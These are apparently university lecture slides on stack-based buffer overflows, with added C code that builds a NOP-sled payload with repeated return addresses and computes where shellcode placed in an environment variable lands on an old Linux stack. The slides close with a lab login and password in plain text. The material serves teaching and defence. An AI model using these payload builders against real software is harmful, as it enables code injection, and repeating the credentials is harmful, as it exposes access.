Stack-based buffer overflows, part 2
Yves Younan, DistriNet, Department of Computer Science
Katholieke Universiteit Leuven, Belgium
Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks March 22, 2005 - 2
Overview
Code injection
Code injection
Finding the inserted code is sometimes a problem
Often an attacker fills the buffer with NOPs (a "NOP sled") and places the shellcode at the end of it
If the guessed address is slightly off, execution lands somewhere in the NOPs and slides into the shellcode instead of crashing
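The payload layout described above, as an added example that is not part of the original slides: a NOP sled, the shellcode, and the guessed address repeated so that the saved return address is hit. The 64-byte buffer, the address guess 0xbffff5a0 and the four int3 bytes standing in for shellcode are all constructed assumptions for the demo; nothing here is a real exploit for any program.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90   /* x86 one-byte NOP */

/* Fill out[0..len) as [NOP sled][shellcode][guessed address, repeated].
 * The address is written little-endian (x86) and repeated `ret_copies`
 * times so the saved return address is hit even if its exact offset is
 * off by a word. Returns the sled length (0 if the tail does not fit). */
size_t build_payload(uint8_t *out, size_t len,
                     const uint8_t *shellcode, size_t sclen,
                     uint32_t ret, size_t ret_copies)
{
    size_t tail = sclen + 4 * ret_copies;
    if (sclen == 0 || tail > len)
        return 0;
    size_t sled = len - tail;

    memset(out, NOP, sled);
    memcpy(out + sled, shellcode, sclen);
    for (size_t i = 0; i < ret_copies; i++) {
        uint8_t *p = out + sled + sclen + 4 * i;
        p[0] = (uint8_t)ret;
        p[1] = (uint8_t)(ret >> 8);
        p[2] = (uint8_t)(ret >> 16);
        p[3] = (uint8_t)(ret >> 24);
    }
    return sled;
}

/* A return into buffer + off executes the shellcode when off lands in the
 * sled or exactly on the first shellcode byte; anything else (mid-shellcode,
 * on the addresses, outside the buffer) does not. */
int landing_ok(long off, size_t sled)
{
    return off >= 0 && (size_t)off <= sled;
}

/* Constructed demo: 64-byte buffer (assumed), four int3 bytes standing in
 * for shellcode, and an address guess as one would read it from gdb. */
uint8_t demo_payload[64];
const uint8_t demo_shellcode[4] = { 0xcc, 0xcc, 0xcc, 0xcc };
const uint32_t demo_guess = 0xbffff5a0u;

size_t demo_build(void)
{
    return build_payload(demo_payload, sizeof demo_payload,
                         demo_shellcode, sizeof demo_shellcode, demo_guess, 3);
}

int main(void)
{
    size_t sled = demo_build();
    printf("sled: %zu NOPs, shellcode at +%zu, address 0x%08x x3 at +%zu\n",
           sled, sled, demo_guess, sled + sizeof demo_shellcode);
    for (long off = -1; off <= (long)sizeof demo_payload; off += 8)
        printf("return to buffer%+ld: %s\n", off,
               landing_ok(off, sled) ? "reaches shellcode" : "miss");
    return 0;
}
```

The sled length returned by build_payload is the whole window of addresses that still work: with a 64-byte buffer and 16 bytes of tail, any guess from buffer+0 to buffer+48 executes the shellcode, which is why a guess taken from gdb can be somewhat off and still succeed.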
Gdb intro
Compile the code with -g for debugging information, then load it in the debugger: gdb program
break main -> tells the debugger to stop when main is reached
run -> runs the program
x buffer -> prints the contents of buffer and its address (e.g. x/64xb buffer for 64 bytes in hex)
If the shellcode is stored in the buffer, that address is the value to overwrite the return address with
Execve
execve allows execution of a program in place of the current process:
    int execve(const char *filename, char *const argv[], char *const envp[]);
Must pass an array of argument strings terminated with NULL; note that the program name is argument 0
Must also pass an array of environment strings (NAME=value), also terminated with NULL
Execve
#include <unistd.h>

int main(int argc, char **argv)
{
    /* arguments for the new program: argv[0] is the program name, NULL-terminated */
    char *execargv[3] = { "/bin/ls", "--color=always", NULL };
    /* environment for the new program, NULL-terminated */
    char *env[2] = { "TEST=1", NULL };
    execve(execargv[0], execargv, env);
    return 1; /* only reached if execve fails */
}
Finding inserted code
Generally (on kernels < 2.6) the stack starts at a static address (0xBFFFFFFF on x86 Linux)
Finding the shellcode means running the program with a fixed set of arguments and a fixed environment; this results in the same address every time
Not very precise: a small change (an extra or longer environment variable, a different program path, running under gdb, which adds variables such as LINES and COLUMNS) results in a different location of the code
It is not mandatory to put the shellcode in the buffer used to overflow; it can also be passed as an environment variable
Controlling the environment
Stack layout at process start (x86 Linux, stack start 0xBFFFFFFF), from high to low addresses:
    High addr   0xBFFFFFFF: 0,0,0,0 (4 null bytes)
                Program name (null-terminated, the path as passed to execve)
                Env var n
                Env var n-1
                ...
                Env var 0
                Arg n
                Arg n-1
                ...
    Low addr    Arg 0
Passing shellcode as environment variable (as the last one, env var n, directly below the program name):
    Stack start - 4 null bytes - strlen(program name) - null byte (program name) - strlen(shellcode)
    0xBFFFFFFF - 4 - strlen(program name) - 1 - strlen(shellcode)
Here strlen(shellcode) counts the code bytes only; since the code sits at the end of the environment string, the formula holds whether the string is the bare shellcode or NAME=shellcode
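The address computation from this slide, as an added example that is not part of the original slides. The target path ./vuln and the four placeholder bytes standing in for shellcode are constructed assumptions; the helper also accepts a NAME= prefix length to show that the code address does not change. The fixed layout it relies on is the one described above for kernels before stack randomization; it does not hold once the kernel randomizes the stack start.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Stack start on the x86 Linux kernels the slides talk about (< 2.6) */
#define STACK_TOP 0xBFFFFFFFUL

/* Address of shellcode carried in the LAST environment string (env var n):
 *   stack top - 4 null bytes - strlen(program name) - its null byte
 *             - strlen(environment string) + length of any "NAME=" prefix
 * Because the code sits at the end of the string, the result is the same
 * whether the code is the whole string (prefix_len 0) or follows "NAME=".
 * `progname` must be the path exactly as passed to execve. */
uintptr_t env_code_addr(uintptr_t stack_top, const char *progname,
                        const char *envstr, size_t prefix_len)
{
    uintptr_t str_start = stack_top - 4 - strlen(progname) - 1 - strlen(envstr);
    return str_start + prefix_len;
}

/* Constructed demo inputs: an assumed target path and four placeholder
 * bytes (three NOPs, one int3) standing in for shellcode. Real shellcode
 * must contain no 0x00 byte, since the environment string ends there. */
const char *demo_target = "./vuln";
const char demo_code[] = "\x90\x90\x90\xcc";

uintptr_t demo_addr(void)
{
    return env_code_addr(STACK_TOP, demo_target, demo_code, 0);
}

int main(int argc, char **argv)
{
    const char *target = argc > 1 ? argv[1] : demo_target;
    uintptr_t addr = env_code_addr(STACK_TOP, target, demo_code, 0);
    printf("%s: code in last env var expected at 0x%lx\n",
           target, (unsigned long)addr);

    /* With a second argument, start the target with the code as its only
     * environment string, which makes it env var n (directly below the
     * program name), so the address above applies. */
    if (argc > 2) {
        char *args[] = { (char *)target, NULL };
        char *env[]  = { (char *)demo_code, NULL };
        execve(target, args, env);
        perror("execve");   /* only reached on failure */
        return 1;
    }
    return 0;
}
```

Starting the target through execve with a hand-built envp, rather than from a shell, is what makes the layout predictable: the shell would add its own variables and the program name would be whatever the shell passed, and both change the result.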
Conclusion
Follow Gera's "Insecure Programming by example": http://community.corest.com/~gera/InsecureProgramming/
Login/pass for the computers: cstudy/distrinet